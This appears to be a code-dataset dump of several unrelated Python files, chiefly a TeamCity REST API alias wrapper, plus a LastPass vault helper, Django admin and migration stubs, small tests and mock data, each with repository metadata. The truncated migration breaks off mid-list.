dohq_teamcity/custom/api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 23
|
2018-10-19T07:28:45.000Z
|
2021-11-12T12:46:09.000Z
|
dohq_teamcity/custom/api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 31
|
2018-10-16T05:53:11.000Z
|
2021-09-09T14:44:14.000Z
|
dohq_teamcity/custom/api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 12
|
2018-10-28T23:00:17.000Z
|
2021-09-07T12:07:13.000Z
|
from dohq_teamcity.api import * # noqa
class AgentApi(AgentApi):
def get(self, agent_locator, **kwargs):
"""
:param async_req: bool
:param str agent_locator: (required)
:param str fields:
:return: Agent
"""
return self.serve_agent(agent_locator, **kwargs)
def get_agent(self, agent_locator, **kwargs):
"""
:param async_req: bool
:param str agent_locator: (required)
:param str fields:
:return: Agent
"""
return self.serve_agent(agent_locator, **kwargs)
def get_agent_field(self, agent_locator, field, **kwargs):
"""
:param async_req: bool
:param str agent_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_agent_field(agent_locator, field, **kwargs)
def get_agents(self, **kwargs):
"""
:param async_req: bool
:param bool include_disconnected:
:param bool include_unauthorized:
:param str locator:
:param str fields:
:return: Agents
"""
return self.serve_agents(**kwargs)
class AgentPoolApi(AgentPoolApi):
def get(self, agent_pool_locator, **kwargs):
"""
:param async_req: bool
:param str agent_pool_locator: (required)
:param str fields:
:return: AgentPool
"""
return self.get_pool(agent_pool_locator, **kwargs)
class BuildApi(BuildApi):
def get(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build(build_locator, **kwargs)
def get_aggregated_build_status(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:return: str
"""
return self.serve_aggregated_build_status(build_locator, **kwargs)
def get_aggregated_build_status_icon(self, build_locator, suffix, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str suffix: (required)
:return: None
"""
return self.serve_aggregated_build_status_icon(
build_locator, suffix, **kwargs)
def get_all_builds(self, **kwargs):
"""
:param async_req: bool
:param str build_type:
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
"""
return self.serve_all_builds(**kwargs)
def get_build(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build(build_locator, **kwargs)
def get_build_actual_parameters(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_build_actual_parameters(build_locator, **kwargs)
def get_build_field_by_build_only(self, build_locator, field, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_by_build_only(
build_locator, field, **kwargs)
def get_build_related_issues(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: IssuesUsages
"""
return self.serve_build_related_issues(build_locator, **kwargs)
def get_build_related_issues_old(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: IssuesUsages
"""
return self.serve_build_related_issues_old(build_locator, **kwargs)
def get_build_statistic_value(self, build_locator, name, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_build_statistic_value(build_locator, name, **kwargs)
def get_build_statistic_values(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_build_statistic_values(build_locator, **kwargs)
def get_build_status_icon(self, build_locator, suffix, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str suffix: (required)
:return: None
"""
return self.serve_build_status_icon(build_locator, suffix, **kwargs)
def get_source_file(self, build_locator, file_name, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str file_name: (required)
:return: None
"""
return self.serve_source_file(build_locator, file_name, **kwargs)
def get_tags(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str locator:
:param str fields:
:return: Tags
"""
return self.serve_tags(build_locator, **kwargs)
class BuildQueueApi(BuildQueueApi):
def get_build_field_by_build_only(self, build_locator, field, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_by_build_only(
build_locator, field, **kwargs)
def get_compatible_agents(self, queued_build_locator, **kwargs):
"""
:param async_req: bool
:param str queued_build_locator: (required)
:param str fields:
:return: Agents
"""
return self.serve_compatible_agents(queued_build_locator, **kwargs)
def get_tags(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str locator:
:param str fields:
:return: Tags
"""
return self.serve_tags(build_locator, **kwargs)
class BuildTypeApi(BuildTypeApi):
def get(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_xml(bt_locator, **kwargs)
def get_branches(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Branches
"""
return self.serve_branches(bt_locator, **kwargs)
def get_build_field(self, bt_locator, build_locator, field, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field(
bt_locator, build_locator, field, **kwargs)
def get_build_type_builds_tags(self, bt_locator, field, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: Tags
"""
return self.serve_build_type_builds_tags(bt_locator, field, **kwargs)
def get_build_type_field(self, bt_locator, field, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_type_field(bt_locator, field, **kwargs)
def get_build_type_template(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_template(bt_locator, **kwargs)
def get_build_type_xml(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_xml(bt_locator, **kwargs)
def get_build_with_project(self, bt_locator, build_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build_with_project(
bt_locator, build_locator, **kwargs)
def get_builds(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
"""
return self.serve_builds(bt_locator, **kwargs)
class ChangeApi(ChangeApi):
def get(self, change_locator, **kwargs):
"""
:param async_req: bool
:param str change_locator: (required)
:param str fields:
:return: Change
"""
return self.serve_change(change_locator, **kwargs)
def get_change(self, change_locator, **kwargs):
"""
:param async_req: bool
:param str change_locator: (required)
:param str fields:
:return: Change
"""
return self.serve_change(change_locator, **kwargs)
def get_changes(self, **kwargs):
"""
:param async_req: bool
:param str project:
:param str build_type:
:param str build:
:param str vcs_root:
:param str since_change:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Changes
"""
return self.serve_changes(**kwargs)
class DefaultApi(DefaultApi):
def get_api_version(self, **kwargs):
"""
:param async_req: bool
:return: str
"""
return self.serve_api_version(**kwargs)
def get_build_field_short(
self,
project_locator,
bt_locator,
build_locator,
field,
**kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_short(
project_locator, bt_locator, build_locator, field, **kwargs)
def get_plugin_info(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Plugin
"""
return self.serve_plugin_info(**kwargs)
def get_root(self, **kwargs):
"""
:param async_req: bool
:return: str
"""
return self.serve_root(**kwargs)
def get_version(self, **kwargs):
"""
:param async_req: bool
:return: str
"""
return self.serve_version(**kwargs)
class GroupApi(GroupApi):
def get(self, group_locator, **kwargs):
"""
:param async_req: bool
:param str group_locator: (required)
:param str fields:
:return: Group
"""
return self.serve_group(group_locator, **kwargs)
def get_group(self, group_locator, **kwargs):
"""
:param async_req: bool
:param str group_locator: (required)
:param str fields:
:return: Group
"""
return self.serve_group(group_locator, **kwargs)
def get_groups(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Groups
"""
return self.serve_groups(**kwargs)
def get_user_properties(self, group_locator, name, **kwargs):
"""
:param async_req: bool
:param str group_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_user_properties(group_locator, name, **kwargs)
class InvestigationApi(InvestigationApi):
def get(self, investigation_locator, **kwargs):
"""
:param async_req: bool
:param str investigation_locator: (required)
:param str fields:
:return: Investigation
"""
return self.serve_instance(investigation_locator, **kwargs)
def get_instance(self, investigation_locator, **kwargs):
"""
:param async_req: bool
:param str investigation_locator: (required)
:param str fields:
:return: Investigation
"""
return self.serve_instance(investigation_locator, **kwargs)
class ProblemApi(ProblemApi):
def get(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: Problem
"""
return self.serve_instance(problem_locator, **kwargs)
def get_instance(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: Problem
"""
return self.serve_instance(problem_locator, **kwargs)
class ProblemOccurrenceApi(ProblemOccurrenceApi):
def get(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: ProblemOccurrence
"""
return self.serve_instance(problem_locator, **kwargs)
def get_instance(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: ProblemOccurrence
"""
return self.serve_instance(problem_locator, **kwargs)
class ProjectApi(ProjectApi):
def get(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: Project
"""
return self.serve_project(project_locator, **kwargs)
def get_build_field_with_project(
self,
project_locator,
bt_locator,
build_locator,
field,
**kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_with_project(
project_locator, bt_locator, build_locator, field, **kwargs)
def get_build_type(self, project_locator, bt_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type(project_locator, bt_locator, **kwargs)
def get_build_type_field_with_project(
self, project_locator, bt_locator, field, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_type_field_with_project(
project_locator, bt_locator, field, **kwargs)
def get_build_type_templates(self, project_locator, bt_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_templates(
project_locator, bt_locator, **kwargs)
def get_build_types_in_project(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: BuildTypes
"""
return self.serve_build_types_in_project(project_locator, **kwargs)
def get_build_with_project(
self,
project_locator,
bt_locator,
build_locator,
**kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build_with_project(
project_locator, bt_locator, build_locator, **kwargs)
def get_builds(self, project_locator, bt_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
"""
return self.serve_builds(project_locator, bt_locator, **kwargs)
def get_project(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: Project
"""
return self.serve_project(project_locator, **kwargs)
def get_project_field(self, project_locator, field, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_project_field(project_locator, field, **kwargs)
def get_projects(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: Projects
"""
return self.serve_projects(**kwargs)
def get_templates_in_project(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: BuildTypes
"""
return self.serve_templates_in_project(project_locator, **kwargs)
class ServerApi(ServerApi):
def get_plugins(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Plugins
"""
return self.serve_plugins(**kwargs)
def get_server_info(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Server
"""
return self.serve_server_info(**kwargs)
def get_server_version(self, field, **kwargs):
"""
:param async_req: bool
:param str field: (required)
:return: str
"""
return self.serve_server_version(field, **kwargs)
class TestApi(TestApi):
def get(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: Test
"""
return self.serve_instance(test_locator, **kwargs)
def get_instance(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: Test
"""
return self.serve_instance(test_locator, **kwargs)
class TestOccurrenceApi(TestOccurrenceApi):
def get(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: TestOccurrence
"""
return self.serve_instance(test_locator, **kwargs)
def get_instance(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: TestOccurrence
"""
return self.serve_instance(test_locator, **kwargs)
class UserApi(UserApi):
def get(self, user_locator, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str fields:
:return: User
"""
return self.serve_user(user_locator, **kwargs)
def get_user(self, user_locator, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str fields:
:return: User
"""
return self.serve_user(user_locator, **kwargs)
def get_user_field(self, user_locator, field, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_user_field(user_locator, field, **kwargs)
def get_user_properties(self, user_locator, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_user_properties(user_locator, **kwargs)
def get_user_property(self, user_locator, name, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_user_property(user_locator, name, **kwargs)
def get_users(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: Users
"""
return self.serve_users(**kwargs)
class VcsRootApi(VcsRootApi):
def get(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRoot
"""
return self.serve_root(vcs_root_locator, **kwargs)
def get_field(self, vcs_root_locator, field, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_field(vcs_root_locator, field, **kwargs)
def get_instance_field(
self,
vcs_root_locator,
vcs_root_instance_locator,
field,
**kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str vcs_root_instance_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_instance_field(
vcs_root_locator, vcs_root_instance_locator, field, **kwargs)
def get_properties(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_properties(vcs_root_locator, **kwargs)
def get_property(self, vcs_root_locator, name, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_property(vcs_root_locator, name, **kwargs)
def get_root(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRoot
"""
return self.serve_root(vcs_root_locator, **kwargs)
def get_root_instance(
self,
vcs_root_locator,
vcs_root_instance_locator,
**kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: VcsRootInstance
"""
return self.serve_root_instance(
vcs_root_locator, vcs_root_instance_locator, **kwargs)
def get_root_instance_properties(
self,
vcs_root_locator,
vcs_root_instance_locator,
**kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_root_instance_properties(
vcs_root_locator, vcs_root_instance_locator, **kwargs)
def get_root_instances(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRootInstances
"""
return self.serve_root_instances(vcs_root_locator, **kwargs)
def get_roots(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: VcsRoots
"""
return self.serve_roots(**kwargs)
class VcsRootInstanceApi(VcsRootInstanceApi):
    """Alias layer over the generated ``VcsRootInstanceApi``.

    Re-declares the class under the same name so that each ``get_*``
    method below simply delegates to the matching ``serve_*`` method
    inherited from the generated base class.
    """

    def get(self, vcs_root_instance_locator, **kwargs):
        """Fetch a single VCS root instance.

        :param async_req: bool
        :param str vcs_root_instance_locator: (required)
        :param str fields:
        :return: VcsRootInstance
        """
        return self.serve_instance(vcs_root_instance_locator, **kwargs)

    def get_instance(self, vcs_root_instance_locator, **kwargs):
        """Fetch a single VCS root instance (same behavior as :meth:`get`).

        :param async_req: bool
        :param str vcs_root_instance_locator: (required)
        :param str fields:
        :return: VcsRootInstance
        """
        return self.serve_instance(vcs_root_instance_locator, **kwargs)

    def get_instance_field(self, vcs_root_instance_locator, field, **kwargs):
        """Read one field of a VCS root instance as a string.

        :param async_req: bool
        :param str vcs_root_instance_locator: (required)
        :param str field: (required)
        :return: str
        """
        value = self.serve_instance_field(
            vcs_root_instance_locator, field, **kwargs)
        return value

    def get_instances(self, **kwargs):
        """List VCS root instances, optionally filtered by a locator.

        :param async_req: bool
        :param str locator:
        :param str fields:
        :return: VcsRootInstances
        """
        return self.serve_instances(**kwargs)

    def get_root_instance_properties(self, vcs_root_instance_locator, **kwargs):
        """Fetch the properties attached to a VCS root instance.

        :param async_req: bool
        :param str vcs_root_instance_locator: (required)
        :param str fields:
        :return: Properties
        """
        props = self.serve_root_instance_properties(
            vcs_root_instance_locator, **kwargs)
        return props
| 29.833333
| 80
| 0.591964
| 3,025
| 27,924
| 5.204628
| 0.040992
| 0.105183
| 0.090447
| 0.107406
| 0.890117
| 0.861026
| 0.830539
| 0.818216
| 0.773882
| 0.739837
| 0
| 0
| 0.306546
| 27,924
| 935
| 81
| 29.865241
| 0.813055
| 0.360335
| 0
| 0.353909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.366255
| false
| 0
| 0.004115
| 0
| 0.8107
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
b28e22454e7cef862fa5b1360058feef496f9769
| 242
|
py
|
Python
|
utils.py
|
dionysio/haveibeenpwned_lastpass
|
efd8f1c785317fd5d948ee91125952219f27e5b2
|
[
"MIT"
] | 101
|
2018-03-05T10:55:40.000Z
|
2021-12-06T22:59:01.000Z
|
utils.py
|
dionysio/haveibeenpwned_lastpass
|
efd8f1c785317fd5d948ee91125952219f27e5b2
|
[
"MIT"
] | 3
|
2018-03-19T22:03:12.000Z
|
2018-03-31T09:24:30.000Z
|
utils.py
|
dionysio/haveibeenpwned_lastpass
|
efd8f1c785317fd5d948ee91125952219f27e5b2
|
[
"MIT"
] | 13
|
2018-03-05T23:06:12.000Z
|
2021-04-21T15:23:22.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import monkeypatch_lastpass
import lastpass
def get_lastpass_vault(username, password, multifactor_password=None):
    """Open the remote LastPass vault for the given account.

    :param username: LastPass account name.
    :param password: master password for the account.
    :param multifactor_password: optional second-factor code; ``None``
        when the account has no multifactor challenge.
    :return: whatever ``lastpass.Vault.open_remote`` yields (the vault).
    """
    vault = lastpass.Vault.open_remote(
        username, password, multifactor_password)
    return vault
| 30.25
| 79
| 0.793388
| 30
| 242
| 6.2
| 0.666667
| 0.139785
| 0.290323
| 0.376344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004587
| 0.099174
| 242
| 8
| 79
| 30.25
| 0.848624
| 0.173554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 1
| 0.5
| 0.25
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
|
0
| 7
|
b2a3e9ad20bc261a0edc524a6069c1c1f3dd00cf
| 175
|
py
|
Python
|
shoppinglist/admin.py
|
ingridguo/django_apps_collection
|
bdc2050c6085937a34229d1b21bd1a304c44f0df
|
[
"MIT"
] | null | null | null |
shoppinglist/admin.py
|
ingridguo/django_apps_collection
|
bdc2050c6085937a34229d1b21bd1a304c44f0df
|
[
"MIT"
] | 1
|
2018-07-08T14:51:52.000Z
|
2018-07-08T14:55:00.000Z
|
shoppinglist/admin.py
|
ingridguo/django_apps_collection
|
bdc2050c6085937a34229d1b21bd1a304c44f0df
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from .models import Item
from .models import ItemsList
# Expose both shopping-list models in the Django admin, in the same
# order as before (ItemsList first, then Item).
for _model in (ItemsList, Item):
    admin.site.register(_model)
| 21.875
| 32
| 0.811429
| 25
| 175
| 5.68
| 0.48
| 0.140845
| 0.225352
| 0.366197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 175
| 8
| 33
| 21.875
| 0.916129
| 0.148571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0c01cddc80fa879938d5f61d3a89133c82cb8220
| 363
|
py
|
Python
|
tests/test_utils.py
|
bfmcneill/twitter_picker
|
651881a4a3750473899c1b289455000a5a137918
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
bfmcneill/twitter_picker
|
651881a4a3750473899c1b289455000a5a137918
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
bfmcneill/twitter_picker
|
651881a4a3750473899c1b289455000a5a137918
|
[
"MIT"
] | null | null | null |
import twitter_picker.utils as utils
def test_project_root_is_path_object():
    """The project-root helper must return a ``pathlib.Path``."""
    import pathlib
    root = utils.get_project_root()
    assert isinstance(root, pathlib.Path)
def test_project_root_is_valid_path():
    """The path returned by the project-root helper must exist on disk."""
    # Dropped the unused local `import pathlib`: .exists() is called on
    # the returned object directly, so no pathlib name is needed here.
    assert utils.get_project_root().exists()
def test_project_root_is_dir():
    """The path returned by the project-root helper must be a directory."""
    # Dropped the unused local `import pathlib`: .is_dir() is called on
    # the returned object directly, so no pathlib name is needed here.
    assert utils.get_project_root().is_dir()
| 21.352941
| 61
| 0.774105
| 53
| 363
| 4.886792
| 0.358491
| 0.254826
| 0.200772
| 0.208494
| 0.525097
| 0.293436
| 0.293436
| 0
| 0
| 0
| 0
| 0
| 0.146006
| 363
| 16
| 62
| 22.6875
| 0.835484
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| true
| 0
| 0.4
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0c4b40e6e3bdbe8085db8f821ed3539bc5493428
| 2,483
|
py
|
Python
|
services/mock.py
|
devx3/hero-testes-tech-talk
|
604641f41c18cd9f9f2b59c8c25cf0a2fc6adfcb
|
[
"MIT"
] | null | null | null |
services/mock.py
|
devx3/hero-testes-tech-talk
|
604641f41c18cd9f9f2b59c8c25cf0a2fc6adfcb
|
[
"MIT"
] | 3
|
2021-09-24T01:23:38.000Z
|
2021-09-28T22:15:29.000Z
|
services/mock.py
|
devx3/hero-testes-tech-talk
|
604641f41c18cd9f9f2b59c8c25cf0a2fc6adfcb
|
[
"MIT"
] | 1
|
2021-09-29T13:18:39.000Z
|
2021-09-29T13:18:39.000Z
|
def _mock_result(request_id):
    """Build one mocked company-lookup response for *request_id*.

    The two entries in RESPONSE_MOCK were identical ~30-line literals
    differing only in their request id; this builder removes that
    duplication. Every placeholder string is preserved byte-for-byte.
    """
    return {
        "request_id": request_id,
        "results": [
            {
                "company_id": "COMPANY_UUID",
                "companies": [
                    {
                        "cnpj": "CNPJ DA EMPRESA",
                        "company_name": "Razão Social",
                        "trading_name": "Nome fantasia",
                        "email": "email@example.net",
                        "phone": "Telefone da empresa",
                        "address_street": "ENDEREÇO SEM O NUMERO",
                        "address_number": "NUMERO",
                        "address_complement": "COMPLEMENTO",
                        "address_district": "BAIRRO",
                        "address_zipcode": "CEP",
                        "address_region": "ESTADO",
                        "address_country": "PAÍS DE ORIGEM",
                        "qsa": [
                            {
                                "first_name": "Primeiro nome",
                                "last_name": "Ultimo nome",
                                "qual": "Função do sócio na empresa"
                            }
                        ]
                    }
                ]
            }
        ]
    }


# Canned responses used by tests: two lookup results that differ only
# in request id. Each call to _mock_result yields fresh (unshared)
# dicts, matching the original's two independent literals.
RESPONSE_MOCK = [
    _mock_result("REQUEST_UUID"),
    _mock_result("REQUEST_UUID2"),
]
| 38.2
| 68
| 0.331051
| 144
| 2,483
| 5.493056
| 0.361111
| 0.045512
| 0.040455
| 0.058154
| 0.932996
| 0.932996
| 0.932996
| 0.932996
| 0.932996
| 0.932996
| 0
| 0.000927
| 0.565445
| 2,483
| 64
| 69
| 38.796875
| 0.732159
| 0
| 0
| 0.59375
| 0
| 0
| 0.34112
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7484596cd3f204bbc3c47fa31256eb5283cb863
| 177,504
|
py
|
Python
|
common/migrations/0001_squashed_0048_auto_20170111_1744.py
|
baylee-d/cos.io
|
3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43
|
[
"Apache-2.0"
] | null | null | null |
common/migrations/0001_squashed_0048_auto_20170111_1744.py
|
baylee-d/cos.io
|
3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43
|
[
"Apache-2.0"
] | null | null | null |
common/migrations/0001_squashed_0048_auto_20170111_1744.py
|
baylee-d/cos.io
|
3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-01-11 18:31
from __future__ import unicode_literals
import common.blocks.collapsebox
import common.blocks.columns
import common.blocks.table
import common.blocks.tabs
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import taggit.managers
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtailembeds.blocks
import wagtail.wagtailimages.blocks
import wagtail.wagtailsearch.index
class Migration(migrations.Migration):
replaces = [('common', '0001_initial'), ('common', '0002_auto_20161010_1354'), ('common', '0003_auto_20161010_1511'), ('common', '0004_auto_20161010_1608'), ('common', '0005_auto_20161010_1645'), ('common', '0006_auto_20161010_1747'), ('common', '0007_auto_20161011_1925'), ('common', '0008_auto_20161011_1937'), ('common', '0009_auto_20161011_1948'), ('common', '0010_auto_20161011_2038'), ('common', '0011_auto_20161011_2129'), ('common', '0012_auto_20161012_1555'), ('common', '0013_auto_20161013_1520'), ('common', '0014_remove_person_title'), ('common', '0015_auto_20161013_1746'), ('common', '0016_auto_20161014_1320'), ('common', '0017_upimagepath'), ('common', '0018_auto_20161014_1805'), ('common', '0019_auto_20161017_1323'), ('common', '0019_auto_20161014_1934'), ('common', '0020_merge_20161017_1426'), ('common', '0021_formpage_action'), ('common', '0018_auto_20161017_1801'), ('common', '0022_merge_20161017_1830'), ('common', '0023_auto_20161017_1849'), ('common', '0016_auto_20161013_2111'), ('common', '0020_merge_20161017_1721'), ('common', '0021_auto_20161017_1734'), ('common', '0024_merge_20161018_2019'), ('common', 